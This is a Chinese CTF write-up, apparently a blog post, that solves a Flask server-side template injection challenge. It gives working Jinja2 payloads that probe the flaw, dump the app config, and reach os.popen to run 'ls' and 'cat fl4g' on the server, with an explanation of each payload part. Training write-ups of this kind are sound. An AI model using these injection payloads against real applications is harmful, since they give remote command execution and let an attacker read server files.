攻防世界 web进阶区 Web_python_template_injection

攻防世界 web进阶区 Web_python_template_injection

通过观察题目,这是一个和python的flask模板漏洞有关的题,打开链接
在这里插入图片描述
直接尝试使用flask模板的漏洞试试,构造的payload为:/{{2*3}}
通过下图的观察,确实存在这样的漏洞。
在这里插入图片描述
然后查看config文件,测试配置文件是否有被禁用,可以看到,配置文件包并没有被禁用。
构造的payload为:/{{config}}
在这里插入图片描述

config文件没有被禁用,接下来就简单了,直接查看服务器的本地文件有哪些,构造的的payload为:
/{{ config.__class__.__init__.__globals__['os'].popen('ls').read() }}
此处我解释下上面的这个payload:

class:用来查看变量所属的类,根据前面的变量形式可以得到其所属的类。
init 初始化类,返回的类型是function
globals[] 使用方式是 函数名.__globals__获取function所处空间下可使用的module、方法以及所有变量。
os.popen() 方法用于从一个命令打开一个管道。

得到如下信息,看到了fl4g,该文件中应该就保存了flag的相关信息
在这里插入图片描述
读取fl4g的相关内容信息,直接得到flag
构造的payload为:/{{ config.__class__.__init__.__globals__['os'].popen('cat fl4g').read() }}
在这里插入图片描述
最终的flag为:ctf{f22b6844-5169-4054-b2a0-d95b9361cb57}
文章仅限于个人对该题的理解,可能有些地方不对,希望网友发现错误之后能够及时评论给予改正。非常的感谢大家。

  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值